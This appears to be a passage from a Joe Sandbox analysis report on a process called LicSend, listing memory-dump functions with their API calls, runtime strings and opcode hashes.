                                                                                                    control_flow_graph 1382 7ff7d3b98800-7ff7d3b9882e wcslen 1383 7ff7d3b98843-7ff7d3b9884c 1382->1383 1384 7ff7d3b98830-7ff7d3b98834 1383->1384 1385 7ff7d3b9884e-7ff7d3b988ec memset wcscpy call 7ff7d3b98640 call 7ff7d3b9951d 1383->1385 1384->1385 1386 7ff7d3b98836-7ff7d3b9883d 1384->1386 1392 7ff7d3b988f3 call 7ff7d3b99559 1385->1392 1393 7ff7d3b988ee 1385->1393 1386->1383 1388 7ff7d3b98905-7ff7d3b98916 1386->1388 1395 7ff7d3b988f8-7ff7d3b988ff 1392->1395 1393->1392 1395->1383 1395->1388
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memsetwcscpywcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3616488086-0
                                                                                                    • Opcode ID: 9edfd7d0855425b0ae0deef05893c38e1a612db14593e8ff65947f8ca7eeef7c
                                                                                                    • Instruction ID: 7216858a60425caeff7613da0c036e6227e86e616cd0683bc868bd17fe767ea3
                                                                                                    • Opcode Fuzzy Hash: 9edfd7d0855425b0ae0deef05893c38e1a612db14593e8ff65947f8ca7eeef7c
                                                                                                    • Instruction Fuzzy Hash: 71210623A1968582E6A0AF11A4407AFE650FB847A4FD00236EFDD66AD5DF7CD146C720
                                                                                                    Function 00007FF7D3B94FA6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _wgetenv
                                                                                                    • String ID: .\
                                                                                                    • API String ID: 1821490009-2381021295
                                                                                                    • Opcode ID: f65007826c5d2034e0bd6c0c5d75f5bc2e06cb7173540385dc56eda673c3ae7b
                                                                                                    • Instruction ID: c2f76b122ab5bf2641de768e6e41e0d7b3cb406b55100f555da9a66e22698162
                                                                                                    • Opcode Fuzzy Hash: f65007826c5d2034e0bd6c0c5d75f5bc2e06cb7173540385dc56eda673c3ae7b
                                                                                                    • Instruction Fuzzy Hash: 42317021A1AB8185EB90EB35D45426EF7A0FB59B84FC08036EA8D577A5EF7CD040C760
                                                                                                    Function 00007FF7D3B97F10 Relevance: 1.3, APIs: 1, Instructions: 49COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memset$wcslen$wcscpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 3662116142-0
                                                                                                    • Opcode ID: ad7ea264d6705331f8fa69273285dea50bc2cad2ccac6b1ac045f466d01280f1
                                                                                                    • Instruction ID: 2b8492b6184e47365517438d4fa0e6f33adae11ae51a65507a14607db5445efe
                                                                                                    • Opcode Fuzzy Hash: ad7ea264d6705331f8fa69273285dea50bc2cad2ccac6b1ac045f466d01280f1
                                                                                                    • Instruction Fuzzy Hash: D901C86271969141E2A0B616A8017EEE651AFC6BD0FD44132FECD23B85CE3CD5458724
                                                                                                    Function 00007FF7D3B98F20 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 2221118986-0
                                                                                                    • Opcode ID: 8dea576aef8b981f98a8e7ecd974372a96d658d19b6fe639ef29c091e0349c6e
                                                                                                    • Instruction ID: e5461a29bb6db0dc054088836bf50d9c9e1bc588e992110b983f05339c909736
                                                                                                    • Opcode Fuzzy Hash: 8dea576aef8b981f98a8e7ecd974372a96d658d19b6fe639ef29c091e0349c6e
                                                                                                    • Instruction Fuzzy Hash: 01F08256B1869641F750AA22A40477FD612A7C8BD4FC48132BE8C5B78EDE3CC4428760

                                                                                                    Non-executed Functions

                                                                                                    Function 00007FF7D3B99F43 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 118COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: signal
                                                                                                    • String ID: CCG
                                                                                                    • API String ID: 1946981877-1584390748
                                                                                                    • Opcode ID: ff0d2e7fe901426664e72cbee57569d38bce1223c774222f042353948147b660
                                                                                                    • Instruction ID: a6af33790a57206277bf6a31c5900f5bb35944259913af7b49f8b14d10d2f07a
                                                                                                    • Opcode Fuzzy Hash: ff0d2e7fe901426664e72cbee57569d38bce1223c774222f042353948147b660
                                                                                                    • Instruction Fuzzy Hash: CC416121E0B50205FAF93579446037CD6825F89375FEA8633DAADA63E2CD6DBC804136
                                                                                                    Function 00007FF7D3B97FD0 Relevance: 10.3, APIs: 8, Instructions: 301COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1297977491-0
                                                                                                    • Opcode ID: ae8519573d4ae9c42e31059e83050413f9089caf48a080b88ae2979aca7b1806
                                                                                                    • Instruction ID: b0b63c1e9b74a470c58d6690d23d985a6403ee97a567ba5ad5ed2274f1b0dab7
                                                                                                    • Opcode Fuzzy Hash: ae8519573d4ae9c42e31059e83050413f9089caf48a080b88ae2979aca7b1806
                                                                                                    • Instruction Fuzzy Hash: A9D1D622A1EA8255EB91EB25E5053ADF7A0AF59784FC48037DA8C57792EF7CE040C770
                                                                                                    Function 00007FF7D3B9AFD0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 111COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: fwprintf
                                                                                                    • String ID: %*.*S$%-*.*S$%.*S
                                                                                                    • API String ID: 968622242-2115465065
                                                                                                    • Opcode ID: a0e62aa8157b28b3d79c8082a980be0690bed007e69c92a4893852fddf75eae1
                                                                                                    • Instruction ID: d4ea3e1de65e15763937dd7db30229ad7dc49fec2fba252e07e6e0c1fcad1f60
                                                                                                    • Opcode Fuzzy Hash: a0e62aa8157b28b3d79c8082a980be0690bed007e69c92a4893852fddf75eae1
                                                                                                    • Instruction Fuzzy Hash: A9411463B1E65245EBD0EA25940037CE290AB84BA4FD88132DA9C676C5DE3DE4418F30
                                                                                                    Function 00007FF7D3B9A400 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Value$CriticalDeleteSectionfree
                                                                                                    • String ID:
                                                                                                    • API String ID: 2588641659-0
                                                                                                    • Opcode ID: 89dab954741aa753b00091b9a80090c60610944642656ed0f2500b768da80e0e
                                                                                                    • Instruction ID: 4e9f9d42130a1403b28930718d3ead9fc1ce0c785c2b9e0d8699606008ff15b2
                                                                                                    • Opcode Fuzzy Hash: 89dab954741aa753b00091b9a80090c60610944642656ed0f2500b768da80e0e
                                                                                                    • Instruction Fuzzy Hash: EE31C964D2E54786EBD4BBA1E85423DF7A1AF98714FC44033D44E222A4DE7CE654CBB0
                                                                                                    Function 00007FF7D3B9A650 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Value$_assertcalloc
                                                                                                    • String ID: !dso || dso == &__dso_handle$../../src/mingw-w64/mingw-w64-crt/crt/tls_atexit.c
                                                                                                    • API String ID: 3698345500-799109717
                                                                                                    • Opcode ID: 3b4b24fa9e65e4cdbba62bd9e1109a5aff04400886c084b3c01c50dbac16368f
                                                                                                    • Instruction ID: fc220f2d4527cd46de420e23977c18905c2a1cd3983352b4c9fb7b37f5f54db3
                                                                                                    • Opcode Fuzzy Hash: 3b4b24fa9e65e4cdbba62bd9e1109a5aff04400886c084b3c01c50dbac16368f
                                                                                                    • Instruction Fuzzy Hash: B8019271B1A60645F7D5AB91F9502BCE791AF4C790FC84036DA4C63391EE3CA991CB70
                                                                                                    Function 00007FF7D3B9B280 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 109COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: %*.*s$%-*.*s$%.*s
                                                                                                    • API String ID: 0-4054516066
                                                                                                    • Opcode ID: 009bcb3d2477e4a7c16a06a38b63ac2a528fc33943df209ece00bc248c0d887a
                                                                                                    • Instruction ID: 03d3d11e6bbda9ea23a4310d7c8f5d17a65abb32c9644979adf7b17c659a8800
                                                                                                    • Opcode Fuzzy Hash: 009bcb3d2477e4a7c16a06a38b63ac2a528fc33943df209ece00bc248c0d887a
                                                                                                    • Instruction Fuzzy Hash: 8241D472A1D20686E7E0EF25C40027CF790EF44B54FD4C136DE8C6A285EAECA6418F70
                                                                                                    Function 00007FF7D3B99A31 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastProtectVirtual
                                                                                                    • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                                    • API String ID: 1672467334-2123141913
                                                                                                    • Opcode ID: b940c59f6861739a50ef932f14fd1f400c8da73d928a9f53d8f92ccb962f4c41
                                                                                                    • Instruction ID: d6290707b805a3501a82163937bb2615797b1838e3da772acbd31625f577ee60
                                                                                                    • Opcode Fuzzy Hash: b940c59f6861739a50ef932f14fd1f400c8da73d928a9f53d8f92ccb962f4c41
                                                                                                    • Instruction Fuzzy Hash: AA31A222A1A6428AEAE1AB51E8406BDF760FB44794FC48133DE8D23294DE3CE945C770
                                                                                                    Function 00007FF7D3B9A5A0 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterLeavecalloc
                                                                                                    • String ID: !dso || dso == &__dso_handle$../../src/mingw-w64/mingw-w64-crt/crt/tls_atexit.c
                                                                                                    • API String ID: 876395260-799109717
                                                                                                    • Opcode ID: fcf295b5aa8768ae6ce15292c97890cb21af645081a82375fce64ba212e4556d
